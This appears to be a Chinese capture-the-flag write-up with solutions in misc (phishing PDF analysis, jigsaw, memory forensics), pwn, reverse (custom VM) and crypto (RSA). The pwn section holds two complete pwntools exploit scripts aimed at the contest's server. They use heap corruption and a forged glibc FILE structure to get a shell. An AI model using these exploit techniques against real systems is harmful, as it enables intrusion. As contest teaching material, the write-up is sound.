Misc

badPDF

用winhex查看16进制,发现很像是钓鱼用的pdf,猜测存在js脚本
把base64字符串头尾冗余数据删除,解密,然后用binwalk -e分离,得到pdf和js脚本以及一个tmp文件,文件里发现疑似处理flag的代码

分析一下可知就是16进制字符串2位一组,每组跟1异或,得到的结果ascii转文本
exp:

from Crypto.Util.number import *
flag=long_to_bytes(0x676d60667a64333665326564333665326564333665326536653265643336656564333665327c)
for i in flag:
    print(chr(i^1),end='')

gogogo

用montage和ps配合gaps拼图,或者文件按照时间排序

montage *.png -tile 16x16 -geometry +0+0 flag.png
gaps --image=flag-1.png --generations=40 --population=256 --size=160


有点小错误,不过不影响判断,得到password:3e8f092d4d7b80ce338d6e238efb01
内存取证,执行vol.py -f 2.raw --profile WinXPSP2x86 filescan | grep zip可以发现csgo.zip.zip,提取出来用密码解密,得到损坏的png图片,用foremost分离,得到一张中间挖空的二维码,还有一张阿兹特克的图片,显然是Aztec二维码
补全后在线网站解密得到flag

Pwn

送分题:

exp:

from pwn import *
# from LibcSearcher import *
context.log_level='debug'

debug = 0

file_name = './pwn'
libc_name = './libc-2.27.so'
ip = '1.13.162.249'
prot = '10001'

if debug:
    r = process(file_name)
    libc = ELF(libc_name)
else:
    r = remote(ip,int(prot))
    libc = ELF(libc_name)

def debug():
    gdb.attach(r)
    raw_input()

def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    file_struct = file_struct.ljust(0x88, "\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, "\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, '\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, "\x00")
    return file_struct

file = ELF(file_name)

sl = lambda x : r.sendline(x)
sd = lambda x : r.send(x)
sla = lambda x,y : r.sendlineafter(x,y)
rud = lambda x : r.recvuntil(x,drop=True)
ru = lambda x : r.recvuntil(x)
li = lambda name,x : log.info(name+':'+hex(x))
ri = lambda  : r.interactive()

ru('Now you can get a big box, what size?')
sl(str(0x1430))
ru('Now you can get a bigger box, what size?')
sl(str(0x5000))
ru('Do you want to rename?(y/n)')
sl('y')
ru('Now your name is:')
main_arena = u64(r.recv(6) + '\x00\x00')
li("main_arena",main_arena)
libc_base = main_arena-0x3ebca0
system = libc_base+libc.symbols['system']
global_max_fast = libc_base+0x3ed940
IO_list_all = libc_base + libc.symbols['_IO_list_all']
IO_str_jumps = 0x3e8360 + libc_base
payload = p64(main_arena)+p64(global_max_fast-0x10)
binsh = 0x00000000001b40fa + libc_base
sl(payload)
# debug()

ru("Do you want to edit big box or bigger box?(1:big/2:bigger)\n")
sl("1")
ru(':\n')

fake_file = pack_file(_IO_read_base=IO_list_all-0x10,
                    _IO_write_base=0,
                    _IO_write_ptr=1,
                    _IO_buf_base=binsh,
                    _mode=0,)

fake_file += p64(IO_str_jumps-8)+p64(0)+p64(system)
sl(fake_file[0x10:])
ri()

peach

exp:

#!/usr/bin/python

from pwn import *
import sys
#from LibcSearcher import LibcSearcher

context.log_level = 'debug'
context.arch='amd64'

local=0

binary_name='peachw'
libc_name='libc-2.26.so'

libc=ELF("./"+libc_name)
e=ELF("./"+binary_name)

if local:
    p=process("./"+binary_name)
    #p=process("./"+binary_name,env={"LD_PRELOAD":"./"+libc_name})
    #p = process(["qemu-arm", "-L", "/usr/arm-linux-gnueabihf", "./"+binary_name])
    #p = process(argv=["./qemu-arm", "-L", "/usr/arm-linux-gnueabihf", "-g", "1234", "./"+binary_name])
else:
    p=remote('1.13.162.249',10003)

def z(a=''):
    if local:
        gdb.attach(p,a)
        if a=='':
            raw_input
    else:
        pass

ru=lambda x:p.recvuntil(x)
sl=lambda x:p.sendline(x)
sd=lambda x:p.send(x)
sa=lambda a,b:p.sendafter(a,b)
sla=lambda a,b:p.sendlineafter(a,b)
ia=lambda :p.interactive()

def leak_address():
    if(context.arch=='i386'):
        return u32(p.recv(4))
    else :
        return u64(p.recv(6).ljust(8,b'\x00'))

def cho(num):
    sa("Your choice: ",p32(num)+b'\x00')

def add(idx,name,size,con):
    cho(1)
    sa("Index ? ",str(idx)+b'\x00')
    sa("please name your peach  : \n",name+b'\x00')
    sa("please input the size of your peach:\n",str(size)+b'\x00')
    sa("please descripe your peach :\n",con)

def add2(idx, name):
    cho(1)
    sa("Index ? ",str(idx)+b'\x00')
    sa("please name your peach  : \n",name+b'\x00')
    sa("please input the size of your peach:\n",str(0x80)+b'\x00')

def edit(idx,size,con):
    cho(4)
    sla("Index ? ",str(idx))
    sa("please input the new size of your peach : \n",p32(size)+b'\x00')
    sa("start to draw your peach \n", con)

def eat(idx,num):
    cho(3)
    sa("Index ? ",str(idx)+b'\x00')
    sa("What's your lucky number?\n",str(num)+b'\x00')

def delete(idx):
    cho(2)
    sa("Index ?",str(idx)+b'\x00')

sa('Do you like peach?\n',b'yes\x00'.ljust(0x1d,'a'))
ru('The peach is ')
flag=int(p.readline().strip('\n'))-0x60
success("flag:"+hex(flag))

payload = 'a'*0x198+chr(flag&0xff)+chr((flag>>8)&0xff)
edit(-36,0x420,payload)

#z('set a=rebase(0x202060)')
#pause()

add(1,'123',0x420,'123')
add(2,'123',0x420,'123')
delete(1)
add2(0,'123')
delete(0)

ia()

Reverse

EasyVM

ida打开分析,查看字符串发现有base64表,查看调用发现魔改的base64加密函数,每4位分别异或0xA,0xB,0xC,0xD
unk_40B050处为密文,unk_40B030处为程序主要执行区,由sub_401000入手分析,把程序运行逻辑分析出来,因为俺只是个破misc手,python用的多点,就用pyhon语法惹

'''
this[1](p)函数指针
this[3]临时变量,用来跟密文比较
this[4]密文,base指针
this[5]比较标志
'''
#CA
this[3]=0
p+=5
#CB
this[4]=0
p+=5
#CC
this[2]=base[0+this[4]]
p+=1
#CF
this[3]^=this[2]
p+=1
#C9
this[2]=0xEE
p+=5
#CF
this[3]^=this[2]
p+=1
#D1
if this[3]==m[0+this[4]]:
    this[5]=1
else:
    if this[3]>=m[0+this[4]]:
        this[5]=2
    else:
        this[5]=0
p+=1
#D3
if this[5]==1:
    p+=3
    #C2
    this[4]+=1 # 1
    p+=1
    #D2
if(this[4]==0x39): # 57,base字符串长度为56,判断是否比较完了
        this[5]=1
    else:
if(this[4]>=0x39):
this[5]=2
        else:
this[5]=0
    p+=5
    #D4
    if this[5]==0:
        p+=0xEC+2 # 溢出为3A
        #CC
        this[2]=base[0+this[4]] # 处理下个字符
        p+=5
    else:
        p+=2
        #FF
        win()
else:
    p+=2
    #FE
    exit()

根据上面的程序流程写个逆向脚本
exp:

import base64
m=[0xBE, 0x36, 0xAC, 0x27, 0x99, 0x4F, 0xDE, 0x44, 0xEE, 0x5F, 
    0xDA, 0x0B, 0xB5, 0x17, 0xB8, 0x68, 0xC2, 0x4E, 0x9C, 0x4A, 
    0xE1, 0x43, 0xF0, 0x22, 0x8A, 0x3B, 0x88, 0x5B, 0xE5, 0x54, 
    0xFF, 0x68, 0xD5, 0x67, 0xD4, 0x06, 0xAD, 0x0B, 0xD8, 0x50, 
    0xF9, 0x58, 0xE0, 0x6F, 0xC5, 0x4A, 0xFD, 0x2F, 0x84, 0x36, 
    0x85, 0x52, 0xFB, 0x73, 0xD7, 0x0D, 0xE3]
'''
m[0]=base[0]^0xEE
m[1]=m[0]^base[1]^0xEE
m[2]=m[1]^base[2]^0xEE
'''
base=[]
tmp=[0xA,0xB,0xC,0xD]
base.append(m[0]^0xEE)
for i in range(1,56):
    base.append(m[i-1]^m[i]^0xEE)
s=b''
for i in range(56):
    base[i]=base[i]^tmp[i%4]
    s+=chr(base[i])
print(base64.b64decode(s))

Crypto

babyrsa

送分题,用factordb在线分解n,再用p和q求私钥解出flag

from gmpy2 import *
from Crypto.Util.number import *
p=133639826298015917901017908376475546339925646165363264658181838203059432536492968144231040597990919971381628901127402671873954769629458944972912180415794436700950304720548263026421362847590283353425105178540468631051824814390421486132775876582962969734956410033443729557703719598998956317920674659744121941513
q=98197216341757567488149177586991336976901080454854408243068885480633972200382596026756300968618883148721598031574296054706280190113587145906781375704611841087782526897314537785060868780928063942914187241017272444601926795083433477673935377466676026146695321415853502288291409333200661670651818749836420808033
e=2199344405076718723439776106818391416986774637417452818162477025957976213477191723664184407417234793814926418366905751689789699138123658292718951547073938244835923378103264574262319868072792187129755570696127796856136279813658923777933069924139862221947627969330450735758091555899551587605175567882253565613163972396640663959048311077691045791516671857020379334217141651855658795614761069687029140601439597978203375244243343052687488606544856116827681065414187957956049947143017305483200122033343857370223678236469887421261592930549136708160041001438350227594265714800753072939126464647703962260358930477570798420877
phi=(p-1)*(q-1)
d=invert(e,phi)
c=1492164290534197296766878830710549288168716657792979479408332026408553210558539364503279432780006256047888761718878241924947937039103166564146378209168719163067531460700424309878383312837345239570897122826051628153030129647363574035072755426112229160684859510640271933580581310029921376842631120847546030843821787623965614564745724229763999106839802052036834811357341644073138100679508864747009014415530176077648226083725813290110828240582884113726976794751006967153951269748482024859714451264220728184903144004573228365893961477199925864862018084224563883101101842275596219857205470076943493098825250412323522013524
m=powmod(c,d,p*q)
print(long_to_bytes(m))

一个梦想成为原画师的卑微ctfer罢了